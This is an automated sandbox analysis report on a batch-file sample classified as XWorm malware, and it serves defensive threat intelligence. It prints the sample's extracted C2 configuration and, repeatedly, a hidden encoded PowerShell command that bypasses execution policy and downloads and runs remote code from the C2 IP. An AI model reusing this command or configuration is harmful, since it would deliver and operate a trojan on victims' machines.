Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Windows Analysis Report
92.255.85.2.bat

Overview

General Information

Sample name:92.255.85.2.bat
Analysis ID:1648674
MD5:dba98e15d9d6d186ec7b4029f49691a9
SHA1:c21a4ab95820f33bff18b333ff33a880f0a7e5dd
SHA256:3f7b520f93027782e5db0e094dd1924c78e6562eb6156dd5d001ec4076413be4
Tags:92-255-85-2batbookingclickfixfakecaptchaSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suspicious powershell command line found
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7732 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7872 cmdline: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • csc.exe (PID: 2168 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 5860 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA33.tmp" "c:\Users\user\AppData\Local\Temp\strztqek\CSC690A104BD3BA4E08BCA82F5F59FD8A8.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • MSBuild.exe (PID: 7384 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{
  "C2 url": [
    "92.255.85.2"
  ],
  "Port": 4372,
  "Aes key": "P0WER",
  "SPL": "<Xwormmm>",
  "Install file": "USB.exe",
  "Version": "XWorm V5.66"
}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x85445:$s4: Stub.exe
  • 0x8555f:$s4: Stub.exe
  • 0x8f192:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8f22f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8f344:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8f004:$cnc4: POST / HTTP/1.1

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6a80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6b1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6c32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x68f2:$cnc4: POST / HTTP/1.1
    00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x6f630:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x71273:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x6f6cd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x71310:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x6f7e2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x71425:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x6f4a2:$cnc4: POST / HTTP/1.1
      • 0x710e5:$cnc4: POST / HTTP/1.1
      00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 4 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        11.2.MSBuild.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          11.2.MSBuild.exe.400000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0x58a9:$str01: $VB$Local_Port
          • 0x589a:$str02: $VB$Local_Host
          • 0x5ba0:$str03: get_Jpeg
          • 0x5552:$str04: get_ServicePack
          • 0x6546:$str05: Select * from AntivirusProduct
          • 0x6744:$str06: PCRestart
          • 0x6758:$str07: shutdown.exe /f /r /t 0
          • 0x680a:$str08: StopReport
          • 0x67e0:$str09: StopDDos
          • 0x68d6:$str10: sendPlugin
          • 0x6956:$str11: OfflineKeylogger Not Enabled
          • 0x6aae:$str12: -ExecutionPolicy Bypass -File "
          • 0x6bd7:$str13: Content-length: 5235
          11.2.MSBuild.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x6af2:$cnc4: POST / HTTP/1.1
          3.2.powershell.exe.28919871ea0.3.unpackJoeSecurity_XWormYara detected XWormJoe Security
            3.2.powershell.exe.28919871ea0.3.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x3aa9:$str01: $VB$Local_Port
            • 0x3a9a:$str02: $VB$Local_Host
            • 0x3da0:$str03: get_Jpeg
            • 0x3752:$str04: get_ServicePack
            • 0x4746:$str05: Select * from AntivirusProduct
            • 0x4944:$str06: PCRestart
            • 0x4958:$str07: shutdown.exe /f /r /t 0
            • 0x4a0a:$str08: StopReport
            • 0x49e0:$str09: StopDDos
            • 0x4ad6:$str10: sendPlugin
            • 0x4b56:$str11: OfflineKeylogger Not Enabled
            • 0x4cae:$str12: -ExecutionPolicy Bypass -File "
            • 0x4dd7:$str13: Content-length: 5235
            Click to see the 13 entries

            Sigma Signatures

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7732, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ProcessId: 7872, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7732, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ProcessId: 7872, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7732, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ProcessId: 7872, ProcessName: powershell.exe
            Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7732, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ProcessId: 7872, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline", ProcessId: 2168, ProcessName: csc.exe
            Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7732, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ProcessId: 7872, ProcessName: powershell.exe
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7872, TargetFilename: C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7732, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ProcessId: 7872, ProcessName: powershell.exe

            Data Obfuscation

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline", ProcessId: 2168, ProcessName: csc.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-26T04:16:32.921009+010020185811A Network Trojan was detected192.168.2.44971792.255.85.280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-26T04:16:31.629098+010020197142Potentially Bad Traffic192.168.2.44971792.255.85.280TCP
            2025-03-26T04:16:32.921009+010020197142Potentially Bad Traffic192.168.2.44971792.255.85.280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-26T04:16:31.629098+010028033053Unknown Traffic192.168.2.44971792.255.85.280TCP
            2025-03-26T04:16:32.921009+010028033053Unknown Traffic192.168.2.44971792.255.85.280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-26T04:16:31.433972+010028607041A Network Trojan was detected192.168.2.44971792.255.85.280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-26T04:16:43.466077+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:16:49.514320+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:17:01.479932+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:17:13.451658+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:17:13.650572+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:17:25.425533+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:17:37.392026+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:17:43.466619+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:17:44.856662+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:17:50.030635+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:17:50.227154+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:17:50.421592+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:17:54.840066+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:17:55.283537+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:18:07.090159+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:18:10.733214+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:18:10.936247+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:18:13.464004+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:18:16.467874+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:18:26.591249+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:18:35.591181+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:18:36.715860+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:18:36.913478+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:18:42.968290+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:18:43.465214+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:18:54.953471+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:18:57.312199+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:02.653237+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
